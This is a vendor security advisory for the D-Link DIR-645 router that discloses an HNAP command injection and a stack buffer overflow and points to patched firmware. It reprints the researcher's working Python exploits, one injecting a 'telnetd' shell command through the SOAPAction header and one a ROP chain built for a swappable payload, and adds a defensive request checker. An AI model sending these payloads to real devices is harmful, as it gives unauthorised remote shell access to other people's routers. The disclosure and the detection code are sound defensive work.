Security Announcement
DIR-645 : Rev. Ax - Command Injection - Buffer Overflow : FW 1.04b12
Publication ID: SAP10051
Resolved Status: Yes
Published on: 13 February 2015 4:29 GMT
Last updated on: 25 April 2015 1:27 GMT

Overview

The DIR-645 Wired/Wireless Router contains a flaw that allows a malicious user to cause an overflow (a halt in the executing application) in the device software that could allow access to its operating system and allow unauthenticated commands to be executed. An additional flaw has been found that allows command injection through its HNAP interface.

References

Samuel Huntley - Contact: Link (Jan. 22, 2015)

Description

The author ran the firmware in an emulator to identify the flaws and wrote proof-of-concept scripts in Python that demonstrate them.

"The buffer overflow does not have a payload at this time, however if you watch the exploit in a debugger, then it can be clearly seen that the payload uses ROP techniques to get to stack payload which is a bunch of C's for now on the stack. It can be replaced with any payload that works on MIPS little endian architecture."

In order to preserve the author's intent and the accuracy of the disclosure, we encourage you to contact the author at the link provided above.

Details

1. Command injection

----------------------------------------------------------------------------------------------------------------------

import socket

# Python 2 proof of concept as supplied in the disclosure (Python 3 would need
# bytes for send). The SOAPAction header carries a shell command after the
# HNAP action URL; the body ("1") matches the declared Content-Length.
buf = ("POST /HNAP1/ HTTP/1.0\r\n"
       "HOST: 192.168.1.8\r\n"
       "User-Agent: test\r\n"
       "Content-Length: 1\r\n"
       "SOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX"
       "test;telnetd -p 9656;test\r\n"
       "1\r\n\r\n")

print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
s.close()

----------------------------------------------------------------------------------------------------------------------

2. Buffer overflow
----------------------------------------------------------------------------------------------------------------------
import socket

# Python 2 proof of concept as supplied in the disclosure. The SOAPAction header
# value overruns a stack buffer; the 4-byte values below are the MIPS little-endian
# addresses the author uses as a ROP chain, and the run of "C"s is the placeholder
# payload referred to in the Description.
exploit_buffer = "POST /HNAP1/ HTTP/1.0\r\nHOST: 10.0.0.1\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";pt;" + "B"*158
exploit_buffer += "C"*50 + "Z"*46

exploit_buffer += "\xb4\x67\xb3\x2a"

exploit_buffer += "\xd0\xeb\xb4\x2a"
exploit_buffer += "VVVV"

exploit_buffer += "\x7c\xba\xb1\x2a"
exploit_buffer += "K"*16

exploit_buffer += "\x44\x3b\xb0\x2A"
exploit_buffer += "A"*36

exploit_buffer += "\xf0\x5e\xb0\x2A"
exploit_buffer += "H"*16

# Placeholder payload, end of header, then the one-byte request body.
exploit_buffer += "C"*212 + "\r\n" + "1\r\n\r\n"

print "[+] sending exploit_buffer size", len(exploit_buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.1", 80))
s.send(exploit_buffer)
s.close()
----------------------------------------------------------------------------------------------------------------------
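Both proofs of concept above deliver their input through the HNAP SOAPAction header. As an added defensive example (not part of the disclosure or of D-Link's advisory), the Python 3 check below parses a raw HTTP request and flags SOAPAction values that carry shell metacharacters, exceed a sane length, or do not have the bare HNAP action-URL form; the length ceiling, the header format and the sample requests are constructed assumptions, not captured traffic.

```python
import re

# Legitimate HNAP SOAPAction: the purenetworks base URL followed by a bare action name.
HNAP_ACTION_RE = re.compile(r'^"?http://purenetworks\.com/HNAP1/[A-Za-z0-9_]+"?$')
# Shell metacharacters that never belong in an action name.
SHELL_META_RE = re.compile(r'[;&|`$<>(){}]')
# Assumed ceiling for a legitimate SOAPAction value; the overflow PoC sends several hundred bytes.
MAX_SOAPACTION_LEN = 96

def parse_http_request(raw):
    """Split a raw HTTP request into (request line, {lower-cased header name: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def check_hnap_request(raw):
    """Return a list of findings for one request; an empty list means nothing suspicious."""
    request_line, headers = parse_http_request(raw)
    action = headers.get("soapaction")
    if "/HNAP1/" not in request_line or action is None:
        return []
    findings = []
    if len(action) > MAX_SOAPACTION_LEN:
        findings.append("oversized SOAPAction (%d bytes)" % len(action))
    if SHELL_META_RE.search(action):
        findings.append("shell metacharacters in SOAPAction")
    if not HNAP_ACTION_RE.match(action):
        findings.append("SOAPAction is not a bare HNAP action URL")
    return findings

# Constructed sample requests (assumptions, not captured traffic).
BENIGN = ("POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.0.1\r\n"
          "SOAPAction: \"http://purenetworks.com/HNAP1/GetDeviceSettings\"\r\n"
          "Content-Length: 0\r\n\r\n")
INJECT = ("POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.0.1\r\n"
          "SOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XXtest;id;test\r\n"
          "Content-Length: 1\r\n\r\n1\r\n\r\n")
OVERFLOW = ("POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.0.1\r\n"
            "SOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + "B" * 400 + "\r\n"
            "Content-Length: 1\r\n\r\n1\r\n\r\n")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("inject", INJECT), ("overflow", OVERFLOW)):
        print(name, check_hnap_request(req) or "ok")
```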
 

 

Affected Product

Model Name | HW Version | Current FW Version   | New FW Version for this exploit fix
DIR-645    | A1         | v. 1.04b12 and older | FW: Patch 1.05b01 (Release Notes: Link)

(Updated: 04/24/2015)

Security patch for your D-Link Devices

These firmware updates address the security vulnerabilities in affected D-Link devices. D-Link will update this page continually, and we strongly recommend that all users install the relevant updates.

As our products come in different hardware revisions, please check the hardware revision of your device before downloading the corresponding firmware update. The hardware revision is usually printed on the product label on the underside of the product, next to the serial number. Alternatively, it can also be found in the device's web configuration interface.